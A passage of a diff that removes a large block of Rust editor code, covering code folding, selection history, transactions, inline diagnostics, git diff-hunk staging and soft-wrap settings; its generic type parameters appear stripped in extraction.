.background_spawn(async move { - let mut inline_diagnostics = Vec::<(Anchor, InlineDiagnostic)>::new(); - for diagnostic_entry in snapshot.diagnostics_in_range(0..snapshot.len()) { - let message = diagnostic_entry - .diagnostic - .message - .split_once('\n') - .map(|(line, _)| line) - .map(SharedString::new) - .unwrap_or_else(|| { - SharedString::from(diagnostic_entry.diagnostic.message) - }); - let start_anchor = snapshot.anchor_before(diagnostic_entry.range.start); - let (Ok(i) | Err(i)) = inline_diagnostics - .binary_search_by(|(probe, _)| probe.cmp(&start_anchor, &snapshot)); - inline_diagnostics.insert( - i, - ( - start_anchor, - InlineDiagnostic { - message, - group_id: diagnostic_entry.diagnostic.group_id, - start: diagnostic_entry.range.start.to_point(&snapshot), - is_primary: diagnostic_entry.diagnostic.is_primary, - severity: diagnostic_entry.diagnostic.severity, - }, - ), - ); - } - inline_diagnostics - }) - .await; - - editor - .update(cx, |editor, cx| { - editor.inline_diagnostics = new_inline_diagnostics; - cx.notify(); - }) - .ok(); - }); - } - - pub fn set_selections_from_remote( - &mut self, - selections: Vec>, - pending_selection: Option>, - window: &mut Window, - cx: &mut Context, - ) { - let old_cursor_position = self.selections.newest_anchor().head(); - self.selections.change_with(cx, |s| { - s.select_anchors(selections); - if let Some(pending_selection) = pending_selection { - s.set_pending(pending_selection, SelectMode::Character); - } else { - s.clear_pending(); - } - }); - self.selections_did_change(false, &old_cursor_position, true, window, cx); - } - - fn push_to_selection_history(&mut self) { - self.selection_history.push(SelectionHistoryEntry { - selections: self.selections.disjoint_anchors(), - select_next_state: self.select_next_state.clone(), - select_prev_state: self.select_prev_state.clone(), - add_selections_state: self.add_selections_state.clone(), - }); - } - - pub fn transact( - &mut self, - window: &mut Window, - cx: &mut 
Context, - update: impl FnOnce(&mut Self, &mut Window, &mut Context), - ) -> Option { - self.start_transaction_at(Instant::now(), window, cx); - update(self, window, cx); - self.end_transaction_at(Instant::now(), cx) - } - - pub fn start_transaction_at( - &mut self, - now: Instant, - window: &mut Window, - cx: &mut Context, - ) { - self.end_selection(window, cx); - if let Some(tx_id) = self - .buffer - .update(cx, |buffer, cx| buffer.start_transaction_at(now, cx)) - { - self.selection_history - .insert_transaction(tx_id, self.selections.disjoint_anchors()); - cx.emit(EditorEvent::TransactionBegun { - transaction_id: tx_id, - }) - } - } - - pub fn end_transaction_at( - &mut self, - now: Instant, - cx: &mut Context, - ) -> Option { - if let Some(transaction_id) = self - .buffer - .update(cx, |buffer, cx| buffer.end_transaction_at(now, cx)) - { - if let Some((_, end_selections)) = - self.selection_history.transaction_mut(transaction_id) - { - *end_selections = Some(self.selections.disjoint_anchors()); - } else { - log::error!("unexpectedly ended a transaction that wasn't started by this editor"); - } - - cx.emit(EditorEvent::Edited { transaction_id }); - Some(transaction_id) - } else { - None - } - } - - pub fn set_mark(&mut self, _: &actions::SetMark, window: &mut Window, cx: &mut Context) { - if self.selection_mark_mode { - self.change_selections(None, window, cx, |s| { - s.move_with(|_, sel| { - sel.collapse_to(sel.head(), SelectionGoal::None); - }); - }) - } - self.selection_mark_mode = true; - cx.notify(); - } - - pub fn swap_selection_ends( - &mut self, - _: &actions::SwapSelectionEnds, - window: &mut Window, - cx: &mut Context, - ) { - self.change_selections(None, window, cx, |s| { - s.move_with(|_, sel| { - if sel.start != sel.end { - sel.reversed = !sel.reversed - } - }); - }); - self.request_autoscroll(Autoscroll::newest(), cx); - cx.notify(); - } - - pub fn toggle_fold( - &mut self, - _: &actions::ToggleFold, - window: &mut Window, - cx: &mut Context, - ) { 
- if self.is_singleton(cx) { - let selection = self.selections.newest::(cx); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let range = if selection.is_empty() { - let point = selection.head().to_display_point(&display_map); - let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); - let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) - .to_point(&display_map); - start..end - } else { - selection.range() - }; - if display_map.folds_in_range(range).next().is_some() { - self.unfold_lines(&Default::default(), window, cx) - } else { - self.fold(&Default::default(), window, cx) - } - } else { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_ids: HashSet<_> = self - .selections - .disjoint_anchor_ranges() - .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) - .collect(); - - let should_unfold = buffer_ids - .iter() - .any(|buffer_id| self.is_buffer_folded(*buffer_id, cx)); - - for buffer_id in buffer_ids { - if should_unfold { - self.unfold_buffer(buffer_id, cx); - } else { - self.fold_buffer(buffer_id, cx); - } - } - } - } - - pub fn toggle_fold_recursive( - &mut self, - _: &actions::ToggleFoldRecursive, - window: &mut Window, - cx: &mut Context, - ) { - let selection = self.selections.newest::(cx); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let range = if selection.is_empty() { - let point = selection.head().to_display_point(&display_map); - let start = DisplayPoint::new(point.row(), 0).to_point(&display_map); - let end = DisplayPoint::new(point.row(), display_map.line_len(point.row())) - .to_point(&display_map); - start..end - } else { - selection.range() - }; - if display_map.folds_in_range(range).next().is_some() { - self.unfold_recursive(&Default::default(), window, cx) - } else { - self.fold_recursive(&Default::default(), window, cx) - } - } - - pub fn fold(&mut self, _: &actions::Fold, window: &mut Window, 
cx: &mut Context) { - if self.is_singleton(cx) { - let mut to_fold = Vec::new(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all_adjusted(cx); - - for selection in selections { - let range = selection.range().sorted(); - let buffer_start_row = range.start.row; - - if range.start.row != range.end.row { - let mut found = false; - let mut row = range.start.row; - while row <= range.end.row { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) - { - found = true; - row = crease.range().end.row + 1; - to_fold.push(crease); - } else { - row += 1 - } - } - if found { - continue; - } - } - - for row in (0..=range.start.row).rev() { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { - if crease.range().end.row >= buffer_start_row { - to_fold.push(crease); - if row <= range.start.row { - break; - } - } - } - } - } - - self.fold_creases(to_fold, true, window, cx); - } else { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_ids = self - .selections - .disjoint_anchor_ranges() - .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) - .collect::>(); - for buffer_id in buffer_ids { - self.fold_buffer(buffer_id, cx); - } - } - } - - fn fold_at_level( - &mut self, - fold_at: &FoldAtLevel, - window: &mut Window, - cx: &mut Context, - ) { - if !self.buffer.read(cx).is_singleton() { - return; - } - - let fold_at_level = fold_at.0; - let snapshot = self.buffer.read(cx).snapshot(cx); - let mut to_fold = Vec::new(); - let mut stack = vec![(0, snapshot.max_row().0, 1)]; - - while let Some((mut start_row, end_row, current_level)) = stack.pop() { - while start_row < end_row { - match self - .snapshot(window, cx) - .crease_for_buffer_row(MultiBufferRow(start_row)) - { - Some(crease) => { - let nested_start_row = crease.range().start.row + 1; - let nested_end_row = crease.range().end.row; - - if current_level < fold_at_level { 
- stack.push((nested_start_row, nested_end_row, current_level + 1)); - } else if current_level == fold_at_level { - to_fold.push(crease); - } - - start_row = nested_end_row + 1; - } - None => start_row += 1, - } - } - } - - self.fold_creases(to_fold, true, window, cx); - } - - pub fn fold_all(&mut self, _: &actions::FoldAll, window: &mut Window, cx: &mut Context) { - if self.buffer.read(cx).is_singleton() { - let mut fold_ranges = Vec::new(); - let snapshot = self.buffer.read(cx).snapshot(cx); - - for row in 0..snapshot.max_row().0 { - if let Some(foldable_range) = self - .snapshot(window, cx) - .crease_for_buffer_row(MultiBufferRow(row)) - { - fold_ranges.push(foldable_range); - } - } - - self.fold_creases(fold_ranges, true, window, cx); - } else { - self.toggle_fold_multiple_buffers = cx.spawn_in(window, async move |editor, cx| { - editor - .update_in(cx, |editor, _, cx| { - for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { - editor.fold_buffer(buffer_id, cx); - } - }) - .ok(); - }); - } - } - - pub fn fold_function_bodies( - &mut self, - _: &actions::FoldFunctionBodies, - window: &mut Window, - cx: &mut Context, - ) { - let snapshot = self.buffer.read(cx).snapshot(cx); - - let ranges = snapshot - .text_object_ranges(0..snapshot.len(), TreeSitterOptions::default()) - .filter_map(|(range, obj)| (obj == TextObject::InsideFunction).then_some(range)) - .collect::>(); - - let creases = ranges - .into_iter() - .map(|range| Crease::simple(range, self.display_map.read(cx).fold_placeholder.clone())) - .collect(); - - self.fold_creases(creases, true, window, cx); - } - - pub fn fold_recursive( - &mut self, - _: &actions::FoldRecursive, - window: &mut Window, - cx: &mut Context, - ) { - let mut to_fold = Vec::new(); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all_adjusted(cx); - - for selection in selections { - let range = selection.range().sorted(); - let buffer_start_row = range.start.row; - 
- if range.start.row != range.end.row { - let mut found = false; - for row in range.start.row..=range.end.row { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { - found = true; - to_fold.push(crease); - } - } - if found { - continue; - } - } - - for row in (0..=range.start.row).rev() { - if let Some(crease) = display_map.crease_for_buffer_row(MultiBufferRow(row)) { - if crease.range().end.row >= buffer_start_row { - to_fold.push(crease); - } else { - break; - } - } - } - } - - self.fold_creases(to_fold, true, window, cx); - } - - pub fn fold_at( - &mut self, - buffer_row: MultiBufferRow, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - if let Some(crease) = display_map.crease_for_buffer_row(buffer_row) { - let autoscroll = self - .selections - .all::(cx) - .iter() - .any(|selection| crease.range().overlaps(&selection.range())); - - self.fold_creases(vec![crease], autoscroll, window, cx); - } - } - - pub fn unfold_lines(&mut self, _: &UnfoldLines, _window: &mut Window, cx: &mut Context) { - if self.is_singleton(cx) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = &display_map.buffer_snapshot; - let selections = self.selections.all::(cx); - let ranges = selections - .iter() - .map(|s| { - let range = s.display_range(&display_map).sorted(); - let mut start = range.start.to_point(&display_map); - let mut end = range.end.to_point(&display_map); - start.column = 0; - end.column = buffer.line_len(MultiBufferRow(end.row)); - start..end - }) - .collect::>(); - - self.unfold_ranges(&ranges, true, true, cx); - } else { - let multi_buffer_snapshot = self.buffer.read(cx).snapshot(cx); - let buffer_ids = self - .selections - .disjoint_anchor_ranges() - .flat_map(|range| multi_buffer_snapshot.buffer_ids_for_range(range)) - .collect::>(); - for buffer_id in buffer_ids { - self.unfold_buffer(buffer_id, cx); - } - } - } - - pub 
fn unfold_recursive( - &mut self, - _: &UnfoldRecursive, - _window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all::(cx); - let ranges = selections - .iter() - .map(|s| { - let mut range = s.display_range(&display_map).sorted(); - *range.start.column_mut() = 0; - *range.end.column_mut() = display_map.line_len(range.end.row()); - let start = range.start.to_point(&display_map); - let end = range.end.to_point(&display_map); - start..end - }) - .collect::>(); - - self.unfold_ranges(&ranges, true, true, cx); - } - - pub fn unfold_at( - &mut self, - buffer_row: MultiBufferRow, - _window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - - let intersection_range = Point::new(buffer_row.0, 0) - ..Point::new( - buffer_row.0, - display_map.buffer_snapshot.line_len(buffer_row), - ); - - let autoscroll = self - .selections - .all::(cx) - .iter() - .any(|selection| RangeExt::overlaps(&selection.range(), &intersection_range)); - - self.unfold_ranges(&[intersection_range], true, autoscroll, cx); - } - - pub fn unfold_all( - &mut self, - _: &actions::UnfoldAll, - _window: &mut Window, - cx: &mut Context, - ) { - if self.buffer.read(cx).is_singleton() { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - self.unfold_ranges(&[0..display_map.buffer_snapshot.len()], true, true, cx); - } else { - self.toggle_fold_multiple_buffers = cx.spawn(async move |editor, cx| { - editor - .update(cx, |editor, cx| { - for buffer_id in editor.buffer.read(cx).excerpt_buffer_ids() { - editor.unfold_buffer(buffer_id, cx); - } - }) - .ok(); - }); - } - } - - pub fn fold_selected_ranges( - &mut self, - _: &FoldSelectedRanges, - window: &mut Window, - cx: &mut Context, - ) { - let selections = self.selections.all_adjusted(cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - 
let ranges = selections - .into_iter() - .map(|s| Crease::simple(s.range(), display_map.fold_placeholder.clone())) - .collect::>(); - self.fold_creases(ranges, true, window, cx); - } - - pub fn fold_ranges( - &mut self, - ranges: Vec>, - auto_scroll: bool, - window: &mut Window, - cx: &mut Context, - ) { - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let ranges = ranges - .into_iter() - .map(|r| Crease::simple(r, display_map.fold_placeholder.clone())) - .collect::>(); - self.fold_creases(ranges, auto_scroll, window, cx); - } - - pub fn fold_creases( - &mut self, - creases: Vec>, - auto_scroll: bool, - _window: &mut Window, - cx: &mut Context, - ) { - if creases.is_empty() { - return; - } - - let mut buffers_affected = HashSet::default(); - let multi_buffer = self.buffer().read(cx); - for crease in &creases { - if let Some((_, buffer, _)) = - multi_buffer.excerpt_containing(crease.range().start.clone(), cx) - { - buffers_affected.insert(buffer.read(cx).remote_id()); - }; - } - - self.display_map.update(cx, |map, cx| map.fold(creases, cx)); - - if auto_scroll { - self.request_autoscroll(Autoscroll::fit(), cx); - } - - cx.notify(); - - self.scrollbar_marker_state.dirty = true; - self.folds_did_change(cx); - } - - /// Removes any folds whose ranges intersect any of the given ranges. 
- pub fn unfold_ranges( - &mut self, - ranges: &[Range], - inclusive: bool, - auto_scroll: bool, - cx: &mut Context, - ) { - self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { - map.unfold_intersecting(ranges.iter().cloned(), inclusive, cx) - }); - self.folds_did_change(cx); - } - - pub fn fold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { - if self.buffer().read(cx).is_singleton() || self.is_buffer_folded(buffer_id, cx) { - return; - } - let folded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); - self.display_map.update(cx, |display_map, cx| { - display_map.fold_buffers([buffer_id], cx) - }); - cx.emit(EditorEvent::BufferFoldToggled { - ids: folded_excerpts.iter().map(|&(id, _)| id).collect(), - folded: true, - }); - cx.notify(); - } - - pub fn unfold_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { - if self.buffer().read(cx).is_singleton() || !self.is_buffer_folded(buffer_id, cx) { - return; - } - let unfolded_excerpts = self.buffer().read(cx).excerpts_for_buffer(buffer_id, cx); - self.display_map.update(cx, |display_map, cx| { - display_map.unfold_buffers([buffer_id], cx); - }); - cx.emit(EditorEvent::BufferFoldToggled { - ids: unfolded_excerpts.iter().map(|&(id, _)| id).collect(), - folded: false, - }); - cx.notify(); - } - - pub fn is_buffer_folded(&self, buffer: BufferId, cx: &App) -> bool { - self.display_map.read(cx).is_buffer_folded(buffer) - } - - pub fn folded_buffers<'a>(&self, cx: &'a App) -> &'a HashSet { - self.display_map.read(cx).folded_buffers() - } - - pub fn disable_header_for_buffer(&mut self, buffer_id: BufferId, cx: &mut Context) { - self.display_map.update(cx, |display_map, cx| { - display_map.disable_header_for_buffer(buffer_id, cx); - }); - cx.notify(); - } - - /// Removes any folds with the given ranges. 
- pub fn remove_folds_with_type( - &mut self, - ranges: &[Range], - type_id: TypeId, - auto_scroll: bool, - cx: &mut Context, - ) { - self.remove_folds_with(ranges, auto_scroll, cx, |map, cx| { - map.remove_folds_with_type(ranges.iter().cloned(), type_id, cx) - }); - self.folds_did_change(cx); - } - - fn remove_folds_with( - &mut self, - ranges: &[Range], - auto_scroll: bool, - cx: &mut Context, - update: impl FnOnce(&mut DisplayMap, &mut Context), - ) { - if ranges.is_empty() { - return; - } - - let mut buffers_affected = HashSet::default(); - let multi_buffer = self.buffer().read(cx); - for range in ranges { - if let Some((_, buffer, _)) = multi_buffer.excerpt_containing(range.start.clone(), cx) { - buffers_affected.insert(buffer.read(cx).remote_id()); - }; - } - - self.display_map.update(cx, update); - - if auto_scroll { - self.request_autoscroll(Autoscroll::fit(), cx); - } - - cx.notify(); - self.scrollbar_marker_state.dirty = true; - self.active_indent_guides_state.dirty = true; - } - - pub fn update_fold_widths( - &mut self, - widths: impl IntoIterator, - cx: &mut Context, - ) -> bool { - self.display_map - .update(cx, |map, cx| map.update_fold_widths(widths, cx)) - } - - pub fn default_fold_placeholder(&self, cx: &App) -> FoldPlaceholder { - self.display_map.read(cx).fold_placeholder.clone() - } - - pub fn set_expand_all_diff_hunks(&mut self, cx: &mut App) { - self.buffer.update(cx, |buffer, cx| { - buffer.set_all_diff_hunks_expanded(cx); - }); - } - - pub fn expand_all_diff_hunks( - &mut self, - _: &ExpandAllDiffHunks, - _window: &mut Window, - cx: &mut Context, - ) { - self.buffer.update(cx, |buffer, cx| { - buffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx) - }); - } - - pub fn toggle_selected_diff_hunks( - &mut self, - _: &ToggleSelectedDiffHunks, - _window: &mut Window, - cx: &mut Context, - ) { - let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); - self.toggle_diff_hunks_in_ranges(ranges, cx); - } - - pub 
fn diff_hunks_in_ranges<'a>( - &'a self, - ranges: &'a [Range], - buffer: &'a MultiBufferSnapshot, - ) -> impl 'a + Iterator { - ranges.iter().flat_map(move |range| { - let end_excerpt_id = range.end.excerpt_id; - let range = range.to_point(buffer); - let mut peek_end = range.end; - if range.end.row < buffer.max_row().0 { - peek_end = Point::new(range.end.row + 1, 0); - } - buffer - .diff_hunks_in_range(range.start..peek_end) - .filter(move |hunk| hunk.excerpt_id.cmp(&end_excerpt_id, buffer).is_le()) - }) - } - - pub fn has_stageable_diff_hunks_in_ranges( - &self, - ranges: &[Range], - snapshot: &MultiBufferSnapshot, - ) -> bool { - let mut hunks = self.diff_hunks_in_ranges(ranges, &snapshot); - hunks.any(|hunk| hunk.status().has_secondary_hunk()) - } - - pub fn toggle_staged_selected_diff_hunks( - &mut self, - _: &::git::ToggleStaged, - _: &mut Window, - cx: &mut Context, - ) { - let snapshot = self.buffer.read(cx).snapshot(cx); - let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); - let stage = self.has_stageable_diff_hunks_in_ranges(&ranges, &snapshot); - self.stage_or_unstage_diff_hunks(stage, ranges, cx); - } - - pub fn set_render_diff_hunk_controls( - &mut self, - render_diff_hunk_controls: RenderDiffHunkControlsFn, - cx: &mut Context, - ) { - self.render_diff_hunk_controls = render_diff_hunk_controls; - cx.notify(); - } - - pub fn stage_and_next( - &mut self, - _: &::git::StageAndNext, - window: &mut Window, - cx: &mut Context, - ) { - self.do_stage_or_unstage_and_next(true, window, cx); - } - - pub fn unstage_and_next( - &mut self, - _: &::git::UnstageAndNext, - window: &mut Window, - cx: &mut Context, - ) { - self.do_stage_or_unstage_and_next(false, window, cx); - } - - pub fn stage_or_unstage_diff_hunks( - &mut self, - stage: bool, - ranges: Vec>, - cx: &mut Context, - ) { - let task = self.save_buffers_for_ranges_if_needed(&ranges, cx); - cx.spawn(async move |this, cx| { - task.await?; - this.update(cx, |this, cx| { - let 
snapshot = this.buffer.read(cx).snapshot(cx); - let chunk_by = this - .diff_hunks_in_ranges(&ranges, &snapshot) - .chunk_by(|hunk| hunk.buffer_id); - for (buffer_id, hunks) in &chunk_by { - this.do_stage_or_unstage(stage, buffer_id, hunks, cx); - } - }) - }) - .detach_and_log_err(cx); - } - - fn save_buffers_for_ranges_if_needed( - &mut self, - ranges: &[Range], - cx: &mut Context, - ) -> Task> { - let multibuffer = self.buffer.read(cx); - let snapshot = multibuffer.read(cx); - let buffer_ids: HashSet<_> = ranges - .iter() - .flat_map(|range| snapshot.buffer_ids_for_range(range.clone())) - .collect(); - drop(snapshot); - - let mut buffers = HashSet::default(); - for buffer_id in buffer_ids { - if let Some(buffer_entity) = multibuffer.buffer(buffer_id) { - let buffer = buffer_entity.read(cx); - if buffer.file().is_some_and(|file| file.disk_state().exists()) && buffer.is_dirty() - { - buffers.insert(buffer_entity); - } - } - } - - if let Some(project) = &self.project { - project.update(cx, |project, cx| project.save_buffers(buffers, cx)) - } else { - Task::ready(Ok(())) - } - } - - fn do_stage_or_unstage_and_next( - &mut self, - stage: bool, - window: &mut Window, - cx: &mut Context, - ) { - let ranges = self.selections.disjoint_anchor_ranges().collect::>(); - - if ranges.iter().any(|range| range.start != range.end) { - self.stage_or_unstage_diff_hunks(stage, ranges, cx); - return; - } - - self.stage_or_unstage_diff_hunks(stage, ranges, cx); - let snapshot = self.snapshot(window, cx); - let position = self.selections.newest::(cx).head(); - let mut row = snapshot - .buffer_snapshot - .diff_hunks_in_range(position..snapshot.buffer_snapshot.max_point()) - .find(|hunk| hunk.row_range.start.0 > position.row) - .map(|hunk| hunk.row_range.start); - - let all_diff_hunks_expanded = self.buffer().read(cx).all_diff_hunks_expanded(); - // Outside of the project diff editor, wrap around to the beginning. 
- if !all_diff_hunks_expanded { - row = row.or_else(|| { - snapshot - .buffer_snapshot - .diff_hunks_in_range(Point::zero()..position) - .find(|hunk| hunk.row_range.end.0 < position.row) - .map(|hunk| hunk.row_range.start) - }); - } - - if let Some(row) = row { - let destination = Point::new(row.0, 0); - let autoscroll = Autoscroll::center(); - - self.unfold_ranges(&[destination..destination], false, false, cx); - self.change_selections(Some(autoscroll), window, cx, |s| { - s.select_ranges([destination..destination]); - }); - } - } - - fn do_stage_or_unstage( - &self, - stage: bool, - buffer_id: BufferId, - hunks: impl Iterator, - cx: &mut App, - ) -> Option<()> { - let project = self.project.as_ref()?; - let buffer = project.read(cx).buffer_for_id(buffer_id, cx)?; - let diff = self.buffer.read(cx).diff_for(buffer_id)?; - let buffer_snapshot = buffer.read(cx).snapshot(); - let file_exists = buffer_snapshot - .file() - .is_some_and(|file| file.disk_state().exists()); - diff.update(cx, |diff, cx| { - diff.stage_or_unstage_hunks( - stage, - &hunks - .map(|hunk| buffer_diff::DiffHunk { - buffer_range: hunk.buffer_range, - diff_base_byte_range: hunk.diff_base_byte_range, - secondary_status: hunk.secondary_status, - range: Point::zero()..Point::zero(), // unused - }) - .collect::>(), - &buffer_snapshot, - file_exists, - cx, - ) - }); - None - } - - pub fn expand_selected_diff_hunks(&mut self, cx: &mut Context) { - let ranges: Vec<_> = self.selections.disjoint.iter().map(|s| s.range()).collect(); - self.buffer - .update(cx, |buffer, cx| buffer.expand_diff_hunks(ranges, cx)) - } - - pub fn clear_expanded_diff_hunks(&mut self, cx: &mut Context) -> bool { - self.buffer.update(cx, |buffer, cx| { - let ranges = vec![Anchor::min()..Anchor::max()]; - if !buffer.all_diff_hunks_expanded() - && buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx) - { - buffer.collapse_diff_hunks(ranges, cx); - true - } else { - false - } - }) - } - - fn toggle_diff_hunks_in_ranges( - &mut self, - 
ranges: Vec>, - cx: &mut Context, - ) { - self.buffer.update(cx, |buffer, cx| { - let expand = !buffer.has_expanded_diff_hunks_in_ranges(&ranges, cx); - buffer.expand_or_collapse_diff_hunks(ranges, expand, cx); - }) - } - - fn toggle_single_diff_hunk(&mut self, range: Range, cx: &mut Context) { - self.buffer.update(cx, |buffer, cx| { - let snapshot = buffer.snapshot(cx); - let excerpt_id = range.end.excerpt_id; - let point_range = range.to_point(&snapshot); - let expand = !buffer.single_hunk_is_expanded(range, cx); - buffer.expand_or_collapse_diff_hunks_inner([(point_range, excerpt_id)], expand, cx); - }) - } - - pub(crate) fn apply_all_diff_hunks( - &mut self, - _: &ApplyAllDiffHunks, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let buffers = self.buffer.read(cx).all_buffers(); - for branch_buffer in buffers { - branch_buffer.update(cx, |branch_buffer, cx| { - branch_buffer.merge_into_base(Vec::new(), cx); - }); - } - - if let Some(project) = self.project.clone() { - self.save(true, project, window, cx).detach_and_log_err(cx); - } - } - - pub(crate) fn apply_selected_diff_hunks( - &mut self, - _: &ApplyDiffHunk, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let snapshot = self.snapshot(window, cx); - let hunks = snapshot.hunks_for_ranges(self.selections.ranges(cx)); - let mut ranges_by_buffer = HashMap::default(); - self.transact(window, cx, |editor, _window, cx| { - for hunk in hunks { - if let Some(buffer) = editor.buffer.read(cx).buffer(hunk.buffer_id) { - ranges_by_buffer - .entry(buffer.clone()) - .or_insert_with(Vec::new) - .push(hunk.buffer_range.to_offset(buffer.read(cx))); - } - } - - for (buffer, ranges) in ranges_by_buffer { - buffer.update(cx, |buffer, cx| { - buffer.merge_into_base(ranges, cx); - }); - } - }); - - if let Some(project) = self.project.clone() { - self.save(true, project, window, 
cx).detach_and_log_err(cx); - } - } - - pub fn set_gutter_hovered(&mut self, hovered: bool, cx: &mut Context) { - if hovered != self.gutter_hovered { - self.gutter_hovered = hovered; - cx.notify(); - } - } - - pub fn insert_blocks( - &mut self, - blocks: impl IntoIterator>, - autoscroll: Option, - cx: &mut Context, - ) -> Vec { - let blocks = self - .display_map - .update(cx, |display_map, cx| display_map.insert_blocks(blocks, cx)); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - blocks - } - - pub fn resize_blocks( - &mut self, - heights: HashMap, - autoscroll: Option, - cx: &mut Context, - ) { - self.display_map - .update(cx, |display_map, cx| display_map.resize_blocks(heights, cx)); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - } - - pub fn replace_blocks( - &mut self, - renderers: HashMap, - autoscroll: Option, - cx: &mut Context, - ) { - self.display_map - .update(cx, |display_map, _cx| display_map.replace_blocks(renderers)); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - } - - pub fn remove_blocks( - &mut self, - block_ids: HashSet, - autoscroll: Option, - cx: &mut Context, - ) { - self.display_map.update(cx, |display_map, cx| { - display_map.remove_blocks(block_ids, cx) - }); - if let Some(autoscroll) = autoscroll { - self.request_autoscroll(autoscroll, cx); - } - cx.notify(); - } - - pub fn row_for_block( - &self, - block_id: CustomBlockId, - cx: &mut Context, - ) -> Option { - self.display_map - .update(cx, |map, cx| map.row_for_block(block_id, cx)) - } - - pub(crate) fn set_focused_block(&mut self, focused_block: FocusedBlock) { - self.focused_block = Some(focused_block); - } - - pub(crate) fn take_focused_block(&mut self) -> Option { - self.focused_block.take() - } - - pub fn insert_creases( - &mut self, - creases: impl IntoIterator>, - cx: &mut Context, - ) -> Vec { - 
self.display_map - .update(cx, |map, cx| map.insert_creases(creases, cx)) - } - - pub fn remove_creases( - &mut self, - ids: impl IntoIterator, - cx: &mut Context, - ) { - self.display_map - .update(cx, |map, cx| map.remove_creases(ids, cx)); - } - - pub fn longest_row(&self, cx: &mut App) -> DisplayRow { - self.display_map - .update(cx, |map, cx| map.snapshot(cx)) - .longest_row() - } - - pub fn max_point(&self, cx: &mut App) -> DisplayPoint { - self.display_map - .update(cx, |map, cx| map.snapshot(cx)) - .max_point() - } - - pub fn text(&self, cx: &App) -> String { - self.buffer.read(cx).read(cx).text() - } - - pub fn is_empty(&self, cx: &App) -> bool { - self.buffer.read(cx).read(cx).is_empty() - } - - pub fn text_option(&self, cx: &App) -> Option { - let text = self.text(cx); - let text = text.trim(); - - if text.is_empty() { - return None; - } - - Some(text.to_string()) - } - - pub fn set_text( - &mut self, - text: impl Into>, - window: &mut Window, - cx: &mut Context, - ) { - self.transact(window, cx, |this, _, cx| { - this.buffer - .read(cx) - .as_singleton() - .expect("you can only call set_text on editors for singleton buffers") - .update(cx, |buffer, cx| buffer.set_text(text, cx)); - }); - } - - pub fn display_text(&self, cx: &mut App) -> String { - self.display_map - .update(cx, |map, cx| map.snapshot(cx)) - .text() - } - - pub fn wrap_guides(&self, cx: &App) -> SmallVec<[(usize, bool); 2]> { - let mut wrap_guides = smallvec::smallvec![]; - - if self.show_wrap_guides == Some(false) { - return wrap_guides; - } - - let settings = self.buffer.read(cx).language_settings(cx); - if settings.show_wrap_guides { - match self.soft_wrap_mode(cx) { - SoftWrap::Column(soft_wrap) => { - wrap_guides.push((soft_wrap as usize, true)); - } - SoftWrap::Bounded(soft_wrap) => { - wrap_guides.push((soft_wrap as usize, true)); - } - SoftWrap::GitDiff | SoftWrap::None | SoftWrap::EditorWidth => {} - } - wrap_guides.extend(settings.wrap_guides.iter().map(|guide| (*guide, 
false))) - } - - wrap_guides - } - - pub fn soft_wrap_mode(&self, cx: &App) -> SoftWrap { - let settings = self.buffer.read(cx).language_settings(cx); - let mode = self.soft_wrap_mode_override.unwrap_or(settings.soft_wrap); - match mode { - language_settings::SoftWrap::PreferLine | language_settings::SoftWrap::None => { - SoftWrap::None - } - language_settings::SoftWrap::EditorWidth => SoftWrap::EditorWidth, - language_settings::SoftWrap::PreferredLineLength => { - SoftWrap::Column(settings.preferred_line_length) - } - language_settings::SoftWrap::Bounded => { - SoftWrap::Bounded(settings.preferred_line_length) - } - } - } - - pub fn set_soft_wrap_mode( - &mut self, - mode: language_settings::SoftWrap, - - cx: &mut Context, - ) { - self.soft_wrap_mode_override = Some(mode); - cx.notify(); - } - - pub fn set_hard_wrap(&mut self, hard_wrap: Option, cx: &mut Context) { - self.hard_wrap = hard_wrap; - cx.notify(); - } - - pub fn set_text_style_refinement(&mut self, style: TextStyleRefinement) { - self.text_style_refinement = Some(style); - } - - /// called by the Element so we know what style we were most recently rendered with. - pub(crate) fn set_style( - &mut self, - style: EditorStyle, - window: &mut Window, - cx: &mut Context, - ) { - let rem_size = window.rem_size(); - 